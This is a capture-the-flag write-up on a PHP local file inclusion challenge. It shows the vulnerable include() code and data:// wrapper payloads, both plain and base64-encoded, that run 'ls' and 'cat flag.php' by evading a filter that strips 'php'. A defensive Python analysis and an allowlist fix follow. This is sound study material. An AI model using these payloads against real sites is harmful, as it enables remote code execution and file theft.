1. Code audit

```php
<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    // replaces every "php" in the file parameter with ???
    include($file);
}else{
    highlight_file(__FILE__);
}
```
2. Since `php` in the parameter is filtered, the `php://` wrappers are out; use the `data://` wrapper to read the file instead.

```shell
?file=data://text/plain;base64,<?php system('ls');?>

# base64-encoded
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdscycpOz8%2b
```

```shell
?file=data://text/plain;base64,<?php system('cat flag.php');?>

# base64-encoded
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
```

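As an added, defender-side example (not part of this writeup), the Python below contrasts what the challenge's `str_replace` filter sees with what PHP would actually include once the `data:` wrapper body is base64-decoded, and shows a hardened allowlist check that rejects any wrapper outright; the `ALLOWED_FILES` set and the sample queries are assumed/constructed from the two requests above.

```python
import base64
import re
from typing import Optional
from urllib.parse import unquote

# Constructed samples: the two requests from the writeup plus one legitimate request.
SAMPLE_QUERIES = [
    "?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdscycpOz8%2b",
    "?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==",
    "?file=about.php",
]

ALLOWED_FILES = {"index.php", "about.php"}  # hypothetical allowlist for the hardened check


def weak_filter(value: str) -> str:
    """Mirror of the challenge's str_replace('php', '???', $file) (case-sensitive)."""
    return value.replace("php", "???")


def decode_data_wrapper(value: str) -> Optional[str]:
    """Return the decoded body of a base64 data: wrapper, or None if it is not one."""
    m = re.match(r"data:(?://)?[^,]*;base64,(.*)$", value, re.IGNORECASE)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-8", "replace")


def analyse_query(query: str) -> dict:
    """What the keyword filter can act on versus what the include would really execute."""
    value = unquote(query.split("file=", 1)[1])   # PHP sees the URL-decoded parameter
    decoded = decode_data_wrapper(value)
    return {
        "filtered": weak_filter(value),
        "decoded_body": decoded,
        "filter_saw_php": "php" in value,          # literal substring the filter keys on
        "decoded_contains_php": decoded is not None and "php" in decoded,
    }


def safe_include_target(value: str) -> Optional[str]:
    """Hardened replacement: refuse any scheme/wrapper or path and allow only known files."""
    if re.match(r"^[a-z][a-z0-9+.-]*:", value, re.IGNORECASE):  # data:, php:, http:, ...
        return None
    if "/" in value or "\\" in value or value.startswith("."):
        return None
    return value if value in ALLOWED_FILES else None
```

Note that the base64 payload hides the keyword from the filter while the decoded body still contains it, and that the same filter mangles the legitimate `about.php` request; `include` of `data:` (and `php://input`) also depends on `allow_url_include=On`, so disabling it removes this whole bypass class independently of any string filter.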